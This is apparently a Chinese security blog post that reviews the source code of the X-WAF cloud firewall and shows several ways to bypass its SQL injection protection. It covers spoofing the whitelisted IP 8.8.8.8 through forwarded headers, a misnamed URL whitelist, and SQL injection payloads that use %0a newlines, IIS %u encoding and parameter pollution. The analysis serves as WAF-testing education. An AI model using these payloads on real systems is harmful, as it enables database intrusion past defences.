Bypass X-WAF SQL注入防御（多姿勢）

0x00 前言

​ X-WAF是一款適用中、小企業的雲WAF系統，讓中、小企業也可以非常方便地擁有自己的免費雲WAF。

​ 本文從代碼出發，一步步理解WAF的工作原理，多姿勢進行WAF Bypass。

0x01 環境搭建

官網：https://waf.xsec.io

github源碼：https://github.com/xsec-lab/x-waf

X-WAF下載安裝后，設置反向代理訪問構造的SQL注入點

0x02 代碼分析

首先看一下整體的目錄結構，

nginx_conf 目錄為參考配置（可刪除），rules目錄存放過濾規則

init.lua 加載規則，access.lua 程序啟動，config.lua 配置文件

主要邏輯實現全部在util.lua和waf.lua文件。

代碼邏輯很簡單，先熟悉一下檢測流程，程序入口在waf.lua 第262-274行中：

-- waf start
function _M.check()
    if _M.white_ip_check() then
    elseif _M.black_ip_check() then
    elseif _M.user_agent_attack_check() then
    elseif _M.white_url_check() then
    elseif _M.url_attack_check() then
    elseif _M.cc_attack_check() then
    elseif _M.cookie_attack_check() then
    elseif _M.url_args_attack_check() then
    elseif _M.post_attack_check() then
    else
        return
    end

這個一個多條件判斷語句，一旦滿足前面的條件就不再進行后面的檢測。

白名單

首先判斷IP白名單，我們來看一下white_ip_check()函數，同文件下的第50-64行：

-- white ip check
function _M.white_ip_check()
    if config.config_white_ip_check == "on" then
        local IP_WHITE_RULE = _M.get_rule('whiteip.rule')
        local WHITE_IP = util.get_client_ip()
        if IP_WHITE_RULE ~= nil then
            for _, rule in pairs(IP_WHITE_RULE) do
                if rule ~= "" and rulematch(WHITE_IP, rule, "jo") then
                    util.log_record(config.config_log_dir, 'White_IP', ngx.var_request_uri, "", "")
                    return true
                end
            end
        end
    end
end

默認配置IP白名單是開啟狀態，讀取IP白名單規則與獲取的客戶端IP進行比對，我們再來跟進看一下get_client_ip()函數，在util.lua文件中，第83-96行：

-- Get the client IP
function _M.get_client_ip()
    local CLIENT_IP = ngx.req.get_headers()["X_real_ip"]
    if CLIENT_IP == nil then
        CLIENT_IP = ngx.req.get_headers()["X_Forwarded_For"]
    end
    if CLIENT_IP == nil then
        CLIENT_IP = ngx.var.remote_addr
    end
    if CLIENT_IP == nil then
        CLIENT_IP = ""
    end
    return CLIENT_IP
end

在這段獲取客戶端IP的代碼中，獲取的X_real_ip、X_Forwarded_For是用戶可控的，存在客戶端IP地址可偽造的風險。最后再來看一下，rules目錄中whiteip.rule的默認配置：

[{"Id":74,"RuleType":"whiteip","RuleItem":"8.8.8.8"}]

IP白名單規則默認IP：8.8.8.8 為白名單

因此我們可以通過構造HTTP請求Header實現偽造IP來源為 8.8.8.8 ，從而繞過x-waf的所有安全防御。

Bypass 測試

先來一張攔截效果圖

偽造客戶端IP繞過：

另外有趣的是，在blackip.rule里面，把8.8.8.8放置在黑名單里面，但這並沒有什么用，IP白名單已經跳出多條件判斷，不會再進行IP黑名單檢測。CC攻擊的防御也主要是從客戶端獲取IP，也可以偽造客戶端IP輕易繞過限制。

[{"Id":2,"RuleType":"blackip","RuleItem":"8.8.8.8"},{"Id":3,"RuleType":"blackip","RuleItem":"1.1.1.1"}]

同樣來看一下url白名單white_url_check()函數：

function _M.white_url_check()
    if config.config_white_url_check == "on" then
        local URL_WHITE_RULES = _M.get_rule('writeurl.rule')
        local REQ_URI = ngx.var.request_uri
        if URL_WHITE_RULES ~= nil then
            for _, rule in pairs(URL_WHITE_RULES) do
                if rule ~= "" and rulematch(REQ_URI, rule, "joi") then
                    return true
                end
            end
        end
    end
end

添加了一下URL白名單功能，感覺無效，對比了一下rules文件，可以發現加載的rule文件名不一致。

這里應該是作者的一個筆誤，writeurl.rule和whiteUrl.rule。

默認url白名單配置：

[{"Id":73,"RuleType":"whiteUrl","RuleItem":"/news/"}]

另外，這里使用ngx.re.find進行ngx.var.request_uri和rule匹配，只要url中存在/news/，就不進行檢測，繞過安全防御規則。比如 : /test/sql,php/news/?id=1、/test/sql,php?id=1&b=/news/ 等形式可繞過。

正則匹配

接下來，我們主要來看一下M.url_args_attack_check()、M.post_attack_check()：

`-- deny url args
function _M.url_args_attack_check()
    if config.config_url_args_check == "on" then
        local ARGS_RULES = _M.get_rule('args.rule')
        for _, rule in pairs(ARGS_RULES) do
            local REQ_ARGS = ngx.req.get_uri_args()
            for key, val in pairs(REQ_ARGS) do
                local ARGS_DATA = {}
                if type(val) == 'table' then
                    ARGS_DATA = table.concat(val, " ")
                else
                    ARGS_DATA = val
                end
                if ARGS_DATA and type(ARGS_DATA) ~= "boolean" and rule ~= "" and rulematch(unescape(ARGS_DATA), rule, "joi") then
                    util.log_record(config.config_log_dir, 'Get_Attack', ngx.var.request_uri, "-", rule)
                    if config.config_waf_enable == "on" then
                        util.waf_output()
                        return true
                    end
                end
            end
        end
    end
    return false
end`

-- deny post
function _M.post_attack_check()
    if config.config_post_check == "on" then
        ngx.req.read_body()
        local POST_RULES = _M.get_rule('post.rule')
        for _, rule in pairs(POST_RULES) do
            local POST_ARGS = ngx.req.get_post_args() or {}
            for k, v in pairs(POST_ARGS) do
                local post_data = ""
                if type(v) == "table" then
                    post_data = table.concat(v, ", ")
                elseif type(v) == "boolean" then
                    post_data = k
                else
                    post_data = v
                end
                if rule ~= "" and rulematch(post_data, rule, "joi") then
                    util.log_record(config.config_log_dir, 'Post_Attack', post_data, "-", rule)
                    if config.config_waf_enable == "on" then
                        util.waf_output()
                        return true
                    end
                end
            end
        end
    end
    return false
end

 兩段函數在一定程度上是類似的，使用ngx.req.get_uri_args、ngx.req.get_post_args 獲取數據來源，前者來自 uri 請求參數，而后者來自 post 請求內容，並未對數據進行特殊處理，然后都使用rulematch(data, rule, "joi")來進行匹配。

rule中比較關鍵SQL注入防御規則如下：

select.+(from|limit)
(?:(union(.*?)select))
(?:from\W+information_schema\W)

繞過姿勢一：%0a

由於使用的是joi來修飾，我們可以用%0a來進行繞過。

/sql.php?id=1 union%0aselect 1,schema_name,3%0afrom /!12345information_schema.schemata/

繞過姿勢二：%u特性

主要利用IIS服務器支持unicode的解析

/sql.aspx?id=1 union selec%u0054 null,table_name,null fro%u004d information_schema.tables

 

繞過姿勢三：HPP+GPC

使用GPC三種方式可以進行參數傳遞,利用apsx特性，將獲取到參數拼接起來，可成功Bypass

/sql.aspx?id=1 union/*
POST:Id=2*/select null,system_user,null

 

0x03 總結

​ 這是一款適合用來進行WAF Bypass練手的雲WAF，通過代碼層面熟悉WAF的工作原理，進一步理解和應用各種服務器特性、數據庫特性來進行嘗試Bypass。

本文由Bypass原創發布，原文鏈接：https://www.cnblogs.com/xiaozi/p/9132409.html   歡迎分享本文，轉載請保留出處。

關於我：一個網絡安全愛好者，致力於分享原創高質量干貨，歡迎關注我的個人微信公眾號：Bypass--，瀏覽更多精彩文章。